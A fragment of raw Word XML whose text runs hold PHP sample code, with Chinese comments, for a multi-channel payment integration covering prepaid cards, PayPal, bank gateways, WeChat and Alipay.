          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>完美卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(WANMEI),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>搜狐卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SOHU),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>电信卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(TELECOM),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE8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纵游一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(ZONGYOU),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>天下一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(TIANXIA),</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>天宏一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(TIANHONG),32 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一卡通</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(THIRTYTWOCARD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E795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1236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rqid"] = "SZX";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772953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易宝点卡支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B8C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4018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KUAIQIAN_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF4F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KUAIQIAN_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204F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快钱移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43892A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033C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KUAIQIAN_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEEBD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KUAIQIAN_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8D4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快钱移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF1C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935A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PAYPAL_PAYPAL' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8DF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PAYPAL_PAYPAL";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF4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EBF5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urrency</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的对照表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34F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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DF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ABB7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urrency"] = "USD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB20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Paypal</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB89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6218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PAYPAL_CREDITCARD' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F7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PAYPAL_CREDITCARD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D96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6D29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urrency</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的对照表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D85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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5F5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F8A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urrency"] = "USD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CCD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rd_info = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF0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rd_number' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F77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ire_month' =&gt; 1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB25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pire_year' =&gt; 2016, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB8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vv' =&gt; 0,           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF52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rst_name' =&gt; '', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EB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st_name' =&gt; '',  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29163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rd_type' =&gt; 'visa' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396B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9020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dit_card_info"] = (object)$card_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B6F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Paypal</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信用卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507042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DAFB1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PAYPAL_SAVED_CREDITCARD' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A2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PAYPAL_SAVED_CREDITCARD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A249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C5A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urrency</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的对照表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCE2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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624AC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F50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urrency"] = "USD";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBDC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dit_card_id"] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65704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Paypal</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>快捷</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CA7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93B4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GATEWAY' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22940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channel"] = "BC_GATEWAY";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D4E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ay_type"] = "B2C";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064F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AF6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rd_type(string </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) for channel BC_GATEWAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D70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卡类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代表信用卡；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代表借记卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3CD0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0755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rd_type"] = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A754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ank"] = "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3B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网关支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13D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12C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bank(string </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) for channel BC_GATEWAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818E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根据参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>card_type, pay_type(B2C/B2B</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，参数可选</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>确定银行名称，获取银行的方法，即</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A13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4B5C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1B9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ams = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57271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rd_type' =&gt; $data["card_type"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BA3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_type' =&gt; 'B2C' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48F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A00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api-&gt;get_banks($params, 'BC_GATEWAY');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430073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set($info-&gt;result_code) &amp;&amp; $info-&gt;result_code == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E4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nks = $info-&gt;banks;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379E4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4719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data["bank"], $banks)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A029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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bank</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不在限定的范围内</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请重新设置</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5892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F4E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1681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EXPRESS' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EA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EXPRESS";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56578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快捷支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724B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7DB3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NATIVE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51EC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NATIVE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D92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微信扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F99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wx/native.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56D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CB480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3BF0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WX_WAP' : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D57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WX_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DEC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微信移动网页支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62191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75A4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WX_SCAN' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D330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WX_SCAN";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A660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微信刷卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA0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uth_code"] = "13022657110xxxxxxxx";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22E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93398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WX_JSAPI':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E8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WX_JSAPI";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552776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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>微信</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>H5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF72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wx/jsapi.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EAD5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3042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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABB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ALI_QRCODE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B52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ALI_QRCODE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB5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支付宝线下扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6BA7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VENDOR_PATH.'/beecloud/ali/index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2901C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44954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D550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ALI_SCAN' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A10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ALI_SCAN";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677138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支付宝刷卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83C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uth_code"] = "28886955594xxxxxxxx";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44516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2638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BC_ALI_WAP' : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60B7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nel"] = "BC_ALI_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C771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BC</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付宝移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CFE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C081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 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38E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No this type.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D1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2B16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C14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this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC9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de']=$bill_no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B7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money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31287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tatus']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B63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type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B428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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E6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p']=_ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7C0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stem']=$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E9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ctype']=$sctype;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A290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ctype==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033088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cookies']=$scookies;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E05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0D3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ay_record')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397530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5FD9C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_array($type, array('PAYPAL_PAYPAL', 'PAYPAL_CREDITCARD', 'PAYPAL_SAVED_CREDITCARD'))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBCE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international-&gt;bill($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C298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n_array($type, array('BC_ALI_SCAN', 'BC_WX_SCAN'))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB54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api-&gt;offline_bill($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6B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83DB9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api-&gt;bill($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53105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34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sult-&gt;result_code != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFAA5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_r($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A50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2D99C7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7FE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sset($result-&gt;url) &amp;&amp; $result-&gt;url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682479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t'=&gt;$result-&gt;url];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6430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sset($result-&gt;html) &amp;&amp; $result-&gt;html) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD81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result-&gt;html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B537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result-&gt;html];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA47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lse if(isset($result-&gt;code_url) &amp;&amp; $result-&gt;code_url) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F079C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result-&gt;code_url];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211B9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sset($result-&gt;credit_card_id)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC3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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信用卡</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id(PAYPAL_CREDITCARD): '.$result-&gt;credit_card_id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438AC9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isset($result-&gt;id)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E679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gt;$type.'</w:t>
